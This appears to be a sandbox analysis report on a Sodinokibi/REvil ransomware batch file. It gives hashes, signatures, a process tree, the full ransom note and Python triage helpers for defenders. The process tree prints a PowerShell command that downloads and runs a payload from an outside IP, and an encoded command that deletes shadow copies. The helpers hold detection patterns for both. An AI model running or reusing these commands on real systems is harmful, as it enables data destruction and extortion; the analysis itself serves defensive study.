Analysis

  • max time kernel
    134s
  • max time network
    53s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    05-05-2020 09:10

General

  • Target

    DnRWHnp4.bat

  • Size

    195B

  • MD5

    94468061a94b1bdd17ebc1b6bbb3e47b

  • SHA1

    b4a5680c8598467c4a916ba37d936606820449be

  • SHA256

    3e7bed4a943497b3c8a6874e6981a1f3b1799f14f9a4987829baea095fbba311

  • SHA512

    18a6e54cbec9c80d7a03c6af01b1fc538c5d245dad3ea2c48fb2faf3773008fa50e1db201d4246c6019b94717fa7959607d9b71271442b93e787a786e691c166

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/DnRWHnp4

Extracted

Path

C:\4711165170-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 4711165170. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA170DC00071CC2E 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/CA170DC00071CC2E Warning: secondary website can be blocked, thats why first variant much better and more available. 
When you open our website, put the following data in the input form: Key: iojhfVp87d7W2gzXHc7yufz2SVVjahg5IcR0OwqEbHmRl09OXABxCzQs54Vmjfyx T4pAX9h4p/sihQSe9yoAKHwhUP8l4CPNZ4XUSZ24b9jU+X1xHA5JITcED4aSKOcq RGSpvPh21DMsvTDrJMHCqsHLE+r2cW2V6RhQV4SeJDrLtN8Jkep9BsntHBk3HSy5 SS3qSzzjVs/7A2r4I872Jxn+I90qT867I3kt3jP5iXiF2RQ0IzdiHZLm1guyLh7Y wxy+GYZ0prs91HVOO/fFIH5nxQM9NdhMJEDlr0otUnzlvCUK2sMhhMKynlsiumzr OhQJN9sIdJKH94s0JjmlawStHTshDBTjR+1Gay2de9xWjbDFv8VIRjJmcoiJhJfX 8zE4pN/0Vr06S2jKZUNjUXhfeUxcsDpIZQ+kkUqdjuLkutYCsFaWZ/siKXKXBTIC FHrY0g5HJFJqZ11pqeJjJd+QuGREbh8noz7b86irQCx9BhdYXz5jzPSXaua3NUyZ 0MzBPvDYmWBRLlf77HgkMXGA6XQxcYwpg8zCuc7935OehBbkP2HEesu5ve5dd/wd 0bnDxyXREB9Up3Hy3iNJmoRsAx4gtpR1hPPg11TO5TuIxtZZAGWoxMw+rC5aO8Vo VWJDb4NZnVbtwhctMBwMtKK20QQSyGL4dJY0JLXJ5UGZ1X8MDX/oInP3WYRBiRSx ZKO37RYH3fi6lUO4sdkldRKflWI49+bC6vIWZ5vQpkmftuhMhSqZ5PzB/I55Dy8n mfBYaEbAW1/GH2E0rNOFLvkAHtC1MT1EQoluB1SQIGbW2IujOJRCbxSwhL/ffuzR DEUvHDU0CIHR8oPZLlI6IW5ZhTGPMU7eP4rgf83k4CHDNfoBMQkY8c7Mx+kfELKs eY/8GmcemdtV2S+da9bzzMWkwKA5wKZQXYsuR0AFZkOM0e3gEiZiTLxTmJsNMNZT 0JTPpTi35GdUvvpVs6DDl8N5Pucf8ttAHTB9/2jsYhFv0+bTSsc3b1J9CN5w7vo/ LYRr8HoGgQ3p27jjqWZj1T0ub4bjjRGhU8ABikQL9CLxsL51pdoHNT53jVQI4XeD a4thvXMSWlrtyffKhFS+Z+tW3pHSpnbxGMlKLyOsH2DRhxcbOn4+ZlOOF9/na2ho /sPWCxG/QMmzeMegjFQzzkrp7YOwri/K3sk0aL+q+z9Nby4jdraoWAunmwFtR72X 2hWaWFXbCuiipc1xECNXXRHairN83wxvHp8WaskJbGngPqE37rhSxY0OKlhTY0pG Ro1mbC9S644QU0lViiNRWdWB7H8h+XuUgaXlSeoAMopu211D6EHyUg== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA170DC00071CC2E

http://decryptor.cc/CA170DC00071CC2E
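The extracted configuration above carries three victim-specific values that an analyst usually wants pulled out and cross-checked: the appended file extension named in the note, the victim id that both payment URLs share in their path, and the dropped note filename. The following Python extractor is an added worked example and is not part of the sandbox report or its tooling: the sample note is an excerpt of the note shown above with the key block removed, and the regexes, field names and the `<extension>-readme.txt` consistency check (which is the pattern this particular report shows) are this example's own.

```python
import re

# Excerpt of the ransom note and dropped-file path shown in this report,
# embedded as constructed sample input (the RSA key block is omitted).
SAMPLE_NOTE = (
    "---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, "
    "and currently unavailable. You can check it: all files on your system has "
    "extension 4711165170. "
    "a) Download and install TOR browser from this site: https://torproject.org/ "
    "b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CA170DC00071CC2E "
    "2) If TOR blocked in your country, try to use VPN! "
    "b) Open our secondary website: http://decryptor.cc/CA170DC00071CC2E"
)
SAMPLE_NOTE_PATH = r"C:\4711165170-readme.txt"

EXT_RE = re.compile(r"\bextension (\w+)")
# Scheme, host and exactly one path component. The torproject.org link has no
# path component and is therefore not treated as a payment URL.
URL_RE = re.compile(r"(https?)://([^\s/]+)/([A-Za-z0-9]+)")


def parse_note(note):
    """Pull the victim-specific fields out of a Sodinokibi-style note."""
    m = EXT_RE.search(note)
    extension = m.group(1) if m else None
    urls = URL_RE.findall(note)  # list of (scheme, host, path)
    victim_ids = {path for _, _, path in urls}
    return {
        "extension": extension,
        "onion_hosts": [h for _, h, _ in urls if h.endswith(".onion")],
        "clearnet_hosts": [h for _, h, _ in urls if not h.endswith(".onion")],
        # A single id across all URLs; None signals a mismatch worth a look.
        "victim_id": victim_ids.pop() if len(victim_ids) == 1 else None,
        "urls": ["%s://%s/%s" % (s, h, p) for s, h, p in urls],
    }


def note_path_matches(path, extension):
    """Check that the dropped note is named <extension>-readme.txt, the
    naming this report shows (C:\\4711165170-readme.txt for extension 4711165170)."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return extension is not None and name == "%s-readme.txt" % extension


if __name__ == "__main__":
    cfg = parse_note(SAMPLE_NOTE)
    print(cfg)
    print("note path consistent:", note_path_matches(SAMPLE_NOTE_PATH, cfg["extension"]))
```

The victim id is the value to pivot on across a fleet of samples: the same id in the onion and clearnet URLs ties a note to one infection, while the extension is per-victim and the hosts are per-campaign.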

Signatures

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs
  • Drops file in Program Files directory 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Makes http(s) request 1 IoCs

    Contacts server via http/https, possibly for C2 communication.

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\DnRWHnp4.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1432
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/DnRWHnp4');Invoke-GZYYYWYTPJDW;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      • Drops file in Program Files directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      PID:644
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1844
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1580
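The third process in the tree runs `powershell -e` with a base64 argument. powershell.exe reads that value as base64 over the UTF-16LE encoding of the script, and it decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, the shadow-copy wipe that precedes encryption; the Volume Shadow Copy service vssvc.exe starting alongside it is consistent with that. None of the words `Shadowcopy` or `Delete` appear in the raw command line, so a detection that only pattern-matches process arguments misses it. The following Python triage helper is an added example, not tooling from the sandbox that produced this report: it decodes an `-EncodedCommand` argument (any prefix of the switch name, as powershell.exe accepts) and matches both the raw and decoded text against a few indicators. The two command lines are copied from the process tree above; the indicator names and regexes are this example's own choice and are not the sandbox's signatures.

```python
import base64
import binascii
import re

# Command lines copied from the process tree in this report, used here as
# constructed sample input for the triage helper.
SAMPLE_CMDLINES = [
    r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/DnRWHnp4');Invoke-GZYYYWYTPJDW;Start-Sleep -s 10000"''',
    "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==",
]

# Indicator names and patterns are this example's own, not sandbox signatures.
INDICATORS = {
    "download_cradle": re.compile(r"DownloadString\(|\bIEX\b|Invoke-Expression", re.I),
    "shadow_copy_deletion": re.compile(
        r"Win32_Shadowcopy|vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "sleep_stall": re.compile(r"Start-Sleep\s+-s(?:econds)?\s+\d{4,}", re.I),
}

# "-switch value" pairs; the value class is the base64 alphabet plus padding.
SWITCH_RE = re.compile(r"\s-([A-Za-z]+)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none.

    powershell.exe accepts any prefix of the switch name (-e, -ec, -enc, ...),
    and the value is base64 over the UTF-16LE encoding of the script text.
    """
    for m in SWITCH_RE.finditer(" " + cmdline):
        switch, value = m.group(1).lower(), m.group(2)
        if not "encodedcommand".startswith(switch):
            continue  # e.g. -ExecutionPolicy, -File, -s
        try:
            return base64.b64decode(value, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not a real encoded payload, keep looking
    return None


def triage(cmdline):
    """Decode any encoded payload and match indicators against raw + decoded text."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = sorted(name for name, pat in INDICATORS.items() if pat.search(haystack))
    return {"decoded": decoded, "indicators": hits}


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = triage(line)
        print(result["indicators"], result["decoded"])
```

Run against the two sample lines, the first flags the download cradle and the ten-thousand-second sleep, and the second flags shadow-copy deletion only after decoding, which is the point: in a detection pipeline the decode step belongs before the pattern match, and decode failures on a `-e`-style switch are themselves worth logging.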

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f8f6cc7-ae83-4f79-b06e-2b9a49e06c5b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f934678-4276-4d7d-9a2b-7ccacecf398b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_670419ca-9b90-4e9d-a6c5-f73b7563d382

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9065e065-05e7-4eaa-bb93-1db6da178e99

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3b7b651-7089-41b5-9155-3fb877609508

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b7a807a3-f6b6-4397-972a-e9e81988f869

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms